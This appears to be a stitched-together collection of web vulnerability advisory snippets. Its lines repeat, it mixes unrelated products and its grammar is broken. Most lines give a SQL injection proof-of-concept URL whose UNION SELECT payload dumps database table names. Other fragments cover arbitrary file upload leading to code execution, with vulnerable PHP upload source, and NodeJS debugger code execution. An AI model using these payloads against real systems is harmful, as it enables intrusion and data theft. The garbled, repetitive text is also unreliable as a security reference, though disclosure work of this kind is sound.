The vulnerability allows an student members to inject sql commands.... Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- Etc..
The vulnerability allows an student members to inject sql commands.... Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- Etc..
The vulnerability allows an student members to inject sql commands.... Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- Etc..
The vulnerability allows an student members to inject sql commands. Proof of Concept: http://localhost/[PATH]/?church-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+- Etc..
The vulnerability allows an users upload arbitrary file. Vulnerable Source: if(isset($id)){ $user_d=$this->request->data; $this->row_update=$this->table_user->get($id); $this->set('emp_update_row',$this->row_update); if($this->request->is(['post','put'])){ $get_output=$this->check_update_email($this->row_update,$this->request->data('email')); if($get_output == true){ if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){ move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']); $this->store_image=$_FILES['image']['name']; }else{ $this->store_image=$this->request->data('old_image'); }
The vulnerability allows an student users to inject sql commands.... Proof of Concept: http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL] -23102%20UNION%20SELECT%201,2,3,4,5,(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE()),7,8--%20- Etc..
The vulnerability allows an users upload arbitrary file. The application does not validate the file type and extension of the uploaded file, which can be used to upload malicious files and execute arbitrary code on the server.
The vulnerability allows an users upload arbitrary file. The vulnerability is located in the 'updateProfile' function with the failure of the file upload validation. Attacker can upload arbitrary file and execute it in the application path.
The vulnerability allows an Job Seeker & Employer users upload arbitrary file. The vulnerable source code is located in the profileChange and coverChange functions of the User controller, which do not validate the file type before uploading it to the uploads directory.
This module uses the "evaluate" request type of the NodeJS V8 debugger protocol (version 1) to evaluate arbitrary JS and call out to other system commands. The port (default 5858) is not exposed non-locally in default configurations, but may be exposed either intentionally or via misconfiguration.
Services By CQR